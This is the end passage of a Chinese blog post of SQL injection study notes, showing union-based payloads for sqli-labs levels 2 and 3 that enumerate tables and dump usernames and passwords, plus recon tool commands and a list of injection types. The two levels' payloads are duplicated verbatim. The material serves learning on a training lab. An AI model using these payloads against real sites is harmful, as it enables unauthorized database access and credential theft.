<h3 id="第二关"><a href="#第二关" class="headerlink" title="第二关"></a>第二关</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">id=1’</span><br><span class="line">	判断字段数</span><br><span class="line">id=1 or 1=1 union select 1,2 ,3 --+</span><br><span class="line">	为了判断字段位置</span><br><span class="line">id=-1 union select 1,2 ,3 --+</span><br><span class="line">id=999 union select 1,2 ,3 --+</span><br><span class="line">	数据库 security</span><br><span class="line">id=999 union select 1,database(),3 --+</span><br><span class="line">	表名 emails,referers,uagents,users</span><br><span class="line">id=-1 union select 1,GROUP_CONCAT(DISTINCT(table_name)) ,3 from information_schema.tables WHERE table_schema=database() --+</span><br><span class="line">	id,password,username</span><br><span class="line">id=-1 union select 1,GROUP_CONCAT(DISTINCT(column_name)) ,3 from information_schema.columns WHERE table_schema=database() and table_name=&#x27;users&#x27; --+</span><br><span class="line"> 最终结果</span><br><span class="line">id=-1 union select 1,group_concat(username),group_concat(password) from security.users--+</span><br></pre></td></tr></table></figure>

<h3 id="第三关"><a href="#第三关" class="headerlink" title="第三关"></a>第三关</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">id=1’</span><br><span class="line">	判断字段数</span><br><span class="line">id=1 or 1=1 union select 1,2 ,3 --+</span><br><span class="line">	为了判断字段位置</span><br><span class="line">id=-1 union select 1,2 ,3 --+</span><br><span class="line">id=999 union select 1,2 ,3 --+</span><br><span class="line">	数据库 security</span><br><span class="line">id=999 union select 1,database(),3 --+</span><br><span class="line">	表名 emails,referers,uagents,users</span><br><span class="line">id=-1 union select 1,GROUP_CONCAT(DISTINCT(table_name)) ,3 from information_schema.tables WHERE table_schema=database() --+</span><br><span class="line">	id,password,username</span><br><span class="line">id=-1 union select 1,GROUP_CONCAT(DISTINCT(column_name)) ,3 from information_schema.columns WHERE table_schema=database() and table_name=&#x27;users&#x27; --+</span><br><span class="line"> 最终结果</span><br><span class="line">id=-1 union select 1,group_concat(username),group_concat(password) from security.users--+</span><br></pre></td></tr></table></figure>



<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">漏洞盒子</span><br><span class="line">众测</span><br><span class="line">阿里云先知</span><br><span class="line"> </span><br><span class="line"> CMS flarum中文论坛</span><br><span class="line"> </span><br><span class="line"> B站  src挖掘  逻辑挖掘</span><br><span class="line"> 乌云漏洞库</span><br><span class="line"> 关注公众号</span><br><span class="line"> </span><br><span class="line"> youtube</span><br><span class="line"> </span><br><span class="line"> hackerone  漏洞披露</span><br><span class="line"> 1. 信息收集 xray subdomain--target xxx.com--html-output xxx.html</span><br><span class="line"> </span><br><span class="line"> dirsearch 敏感信息目录</span><br><span class="line"> </span><br><span class="line"> 前后端分别渗透  js appid secret js解密</span><br><span class="line"> 后端  逻辑漏洞 </span><br><span class="line"> 			gong</span><br></pre></td></tr></table></figure>

<h3 id=""><a href="#" class="headerlink" title=""></a></h3><p>cmd5-   用来破解密码的</p>
<ol>
<li>单引号输入可以判断是否存在sql注入</li>
<li>sql  injection type</li>
<li>boolean  布尔型注入 a’ 1&#x3D;1 #</li>
<li>nuion 联合注入  gifts union select 1.2.3.4</li>
<li>time-base 基于时间报错注入 gifts  and sleep（2）</li>
<li>error-based 报错型注入</li>
<li>stacked querises</li>
</ol>

  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">更新于</span>
    <time title="修改时间：2023-06-04 14:44:47" itemprop="dateModified" datetime="2023-06-04T14:44:47+08:00">2023-06-04</time>
  </span>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>本文作者： </strong>Kobe_ <i class="ic i-at"><em>@</em></i>简单の博客
  </li>
  <li class="link">
    <strong>本文链接：</strong>
    <a href="http://example.com/2023/05/09/sql%E6%B3%A8%E5%85%A5/" title="sql注入">http://example.com/2023/05/09/sql注入/</a>
  </li>
  <li class="license">
    <strong>版权声明： </strong>本站所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

  <a href="/2023/04/13/javascript/" itemprop="url" rel="prev" data-background-image="https:&#x2F;&#x2F;image.baidu.com&#x2F;search&#x2F;down?url&#x3D;https:&#x2F;&#x2F;lz.sinaimg.cn&#x2F;large&#x2F;6833939bly1giclil3m4ej20zk0m8tn8.jpg" title="javascript">
  <span class="type">上一篇</span>
  <span class="category"><i class="ic i-flag"></i> </span>
  <h3>javascript</h3>
  </a>

    </div>
    <div class="item right">
      

  <a href="/2023/06/01/%E5%B0%8F%E8%BF%AA%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/" itemprop="url" rel="next" data-background-image="https:&#x2F;&#x2F;image.baidu.com&#x2F;search&#x2F;down?url&#x3D;https:&#x2F;&#x2F;lz.sinaimg.cn&#x2F;large&#x2F;6833939bly1gipew8gmvyj20zk0m87wh.jpg" title="小迪网络安全">
  <span class="type">下一篇</span>
  <span class="category"><i class="ic i-flag"></i> </span>
  <h3>小迪网络安全</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="文章目录">
          <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81sql%E6%B3%A8%E5%85%A5%E7%B1%BB%E5%9E%8B"><span class="toc-number">1.</span> <span class="toc-text">常见sql注入类型</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%E6%8C%89%E6%B3%A8%E5%85%A5%E7%82%B9%E5%8C%BA%E5%88%86"><span class="toc-number">1.1.</span> <span class="toc-text">一按注入点区分</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C%E6%8C%89%E6%8F%90%E4%BA%A4%E6%96%B9%E5%BC%8F%E5%8C%BA%E5%88%86"><span class="toc-number">1.2.</span> <span class="toc-text">二按提交方式区分</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%89%E6%8C%89%E9%A1%B5%E9%9D%A2%E6%89%A7%E8%A1%8C%E5%8F%8D%E9%A6%88%E5%8C%BA%E5%88%86"><span class="toc-number">1.3.</span> <span class="toc-text">三按页面执行反馈区分</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5%E7%9A%84%E5%AE%9E%E7%8E%B0%E6%96%B9%E5%BC%8F"><span class="toc-number">2.</span> <span class="toc-text">SQL注入的实现方式</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5%E6%B5%81%E7%A8%8B"><span class="toc-number">2.1.</span> <span class="toc-text">SQL注入流程</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sqlmap%E6%B3%A8%E5%85%A5%E6%BC%94%E7%A4%BA"><span class="toc-number">2.2.</span> <span class="toc-text">sqlmap注入演示</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%BA%E4%BB%80%E4%B9%88%E7%94%A8%E5%8D%95%E5%BC%95%E5%8F%B7%E6%B5%8B%E8%AF%95"><span class="toc-number">2.3.</span> <span class="toc-text">为什么用单引号测试</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BB%93%E6%9E%9C%E9%9B%86%E5%8F%AA%E6%9C%89%E4%B8%80%E4%B8%AA%E5%9B%9E%E6%98%BE"><span class="toc-number">2.4.</span> <span class="toc-text">结果集只有一个回显</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A4%E6%96%AD%E6%B3%A8%E5%85%A5%E7%B1%BB%E5%9E%8B%E7%9A%84%E6%96%B9%E6%B3%95"><span class="toc-number">2.5.</span> <span class="toc-text">判断注入类型的方法</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8"><span class="toc-number">2.6.</span> <span class="toc-text">时间盲注</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%97%B6%E9%97%B4%E6%B3%A8%E5%85%A5%E8%84%9A%E6%9C%AC"><span class="toc-number">2.7.</span> <span class="toc-text">时间注入脚本</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sql%E5%A5%97%E8%B7%AF"><span class="toc-number">2.8.</span> <span class="toc-text">sql套路</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9D%82%E4%B8%83%E6%9D%82%E5%85%AB"><span class="toc-number">2.9.</span> <span class="toc-text">杂七杂八</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B8%B8%E7%94%A8%E5%87%BD%E6%95%B0"><span class="toc-number">2.10.</span> <span class="toc-text">常用函数</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5%E6%9D%A1%E4%BB%B6"><span class="toc-number">2.11.</span> <span class="toc-text">报错注入条件</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#bigint%E6%8A%A5%E9%94%99"><span class="toc-number">2.11.1.</span> <span class="toc-text">bigint报错</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#updatexml%EF%BC%88%EF%BC%89%EF%BC%8Cextractvalue-%E5%87%BD%E6%95%B0"><span class="toc-number">2.11.2.</span> <span class="toc-text">updatexml（），extractvalue ()函数</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B8%83%E5%B0%94%E7%9B%B2%E6%B3%A8"><span class="toc-number">2.12.</span> <span class="toc-text">布尔盲注</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#sqli-labs%E9%9D%B6%E5%9C%BA"><span class="toc-number">3.</span> <span class="toc-text">sqli-labs靶场</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AC%AC%E4%B8%80%E5%85%B3"><span class="toc-number">3.0.1.</span> <span class="toc-text">第一关</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AC%AC%E4%BA%8C%E5%85%B3"><span class="toc-number">3.0.2.</span> <span class="toc-text">第二关</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AC%AC%E4%B8%89%E5%85%B3"><span class="toc-number">3.0.3.</span> <span class="toc-text">第三关</span></a></li><li class="toc-item toc-level-3"><a class="toc-link"><span class="toc-number">3.0.4.</span> <span class="toc-text"></span></a></li></ol></li></ol></li></ol>
      </div>
      <div class="related panel pjax" data-title="系列文章">
      </div>
      <div class="overview panel" data-title="站点概览">
        <div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="image" itemprop="image" alt="Kobe_"
      data-src="https://avatars.githubusercontent.com/u/116647725?s=400&u=c1d12fb27b36682d1ce63e666ba3ed2684c6cc3c&v=4"
  >
  <p class="name" itemprop="name">Kobe_</p>
  <div class="description" itemprop="description"></div>
</div>

<nav class="state">
    <div class="item posts">
      <a href="/archives/">
        <span class="count">12</span>
        <span class="name">文章</span>
      </a>
    </div>
</nav>

<div class="social">
      <span class="exturl item github" data-url="aHR0cHM6Ly9naXRodWIuY29tL0tvYmUtdGltZQ==" title="https:&#x2F;&#x2F;github.com&#x2F;Kobe-time"><i class="ic i-github"></i></span>
      <span class="exturl item music" data-url="aHR0cHM6Ly9tdXNpYy4xNjMuY29tLyMvdXNlci9ob21lP2lkPTE4NzU2OTk4NTQ=" title="https:&#x2F;&#x2F;music.163.com&#x2F;#&#x2F;user&#x2F;home?id&#x3D;1875699854"><i class="ic i-cloud-music"></i></span>
      <span class="exturl item email" data-url="bWFpbHRvOjI5MDc0MTAyNjlAcXEuY29t" title="mailto:2907410269@qq.com"><i class="ic i-envelope"></i></span>
      <span class="exturl item qq" data-url="aHR0cHM6Ly9xbS5xcS5jb20vY2dpLWJpbi9xbS9xcj9rPTRGQVJ0ZzhfQmJXeHNKSUhxUlZGVWtpT2lfbVprS0VTJm5vdmVyaWZ5PTAmcGVyc29uYWxfcXJjb2RlX3NvdXJjZT0z" title="https:&#x2F;&#x2F;qm.qq.com&#x2F;cgi-bin&#x2F;qm&#x2F;qr?k&#x3D;4FARtg8_BbWxsJIHqRVFUkiOi_mZkKES&amp;noverify&#x3D;0&amp;personal_qrcode_source&#x3D;3"><i class="ic i-qq"></i></span>
</div>

<ul class="menu">
  
    
  <li class="item">
    <a href="/" rel="section"><i class="ic i-home"></i>首页</a>
  </li>

    
  <li class="item">
    <a href="/links/" rel="section"><i class="ic i-link"></i>友链</a>
  </li>


</ul>

      </div>
    </div>
  </div>

  <ul id="quick">
    <li class="prev pjax">
        <a href="/2023/04/13/javascript/" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a>
    </li>
    <li class="up"><i class="ic i-arrow-up"></i></li>
    <li class="down"><i class="ic i-arrow-down"></i></li>
    <li class="next pjax">
        <a href="/2023/06/01/%E5%B0%8F%E8%BF%AA%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a>
    </li>
    <li class="percent"></li>
  </ul>
</div>


        </div>
        <div class="dimmer"></div>
      </div>
    </main>
    <footer id="footer">
      <div class="inner">
        <div class="widgets">
          
<div class="rpost pjax">
  <h2>随机文章</h2>
  <ul>
      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/06/04/jdbc/" title="jdbc">jdbc</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/03/16/java%E6%B3%A8%E8%A7%A3%E5%8F%8D%E5%B0%84/" title="java注解反射">java注解反射</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/04/05/chatGPT%E6%8C%87%E4%BB%A4%E5%A4%A7%E5%85%A8/" title="未命名">未命名</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/04/13/javascript/" title="javascript">javascript</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/06/03/hello-world/" title="小迪网络安全">小迪网络安全</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/06/01/%E5%B0%8F%E8%BF%AA%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/" title="小迪网络安全">小迪网络安全</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/05/09/sql%E6%B3%A8%E5%85%A5/" title="sql注入">sql注入</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/03/13/GIT%E4%BD%BF%E7%94%A8/" title="github与git使用">github与git使用</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/06/04/html%E7%AC%94%E8%AE%B0/" title="html笔记">html笔记</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/06/04/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/" title="网络安全路线">网络安全路线</a></span>
  </li>

  </ul>
</div>

        </div>
        <div class="status">
  <div class="copyright">
    
    &copy; 2010 – 
    <span itemprop="copyrightYear">2023</span>
    <span class="with-love">
      <i class="ic i-sakura rotate"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">Kobe_ @ hello world</span>
  </div>
<div class="timing">
  <span id="RunTime"></span>
  <script>
    var BootDate = new Date("2021/10/24 23:00:00"); 
    function ShowRunTime(id) {
      var NowDate = new Date();
      var RunDateM = parseInt(NowDate - BootDate);
      var RunDays = Math.floor(RunDateM/(24*3600*1000));
      var RunHours = Math.floor(RunDateM%(24*3600*1000)/(3600*1000));
      var RunMinutes = Math.floor(RunDateM%(24*3600*1000)%(3600*1000)/(60*1000));
      var RunSeconds = Math.round(RunDateM%(24*3600*1000)%(3600*1000)%(60*1000)/1000);
      var RunTime = RunDays + " 天 " + RunHours + " 时 " + RunMinutes + " 分 " + RunSeconds + " 秒";
      document.getElementById(id).innerHTML = "本站已运行 " + RunTime;
    }
    setInterval("ShowRunTime('RunTime')", 1000);
  </script>
</div>
</div>

      </div>
    </footer>
  </div>
<script data-config type="text/javascript">
  var LOCAL = {
    path: '2023/05/09/sql注入/',
    favicon: {
      show: "（●´3｀●）やれやれだぜ",
      hide: "(´Д｀)大変だ！"
    },
    search : {
      placeholder: "文章搜索",
      empty: "关于 「 ${query} 」，什么也没搜到",
      stats: "${time} ms 内找到 ${hits} 条结果"
    },
    valine: true,fancybox: true,
    copyright: '复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。',
    ignores : [
      function(uri) {
        return uri.includes('#');
      },
      function(uri) {
        return new RegExp(LOCAL.path+"$").test(uri);
      }
    ]
  };
</script>

<script src="https://cdn.polyfill.io/v2/polyfill.js"></script>

<script src="//cdn.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script>

<script src="/js/app.js?v=0.2.5"></script>




</body>
</html>
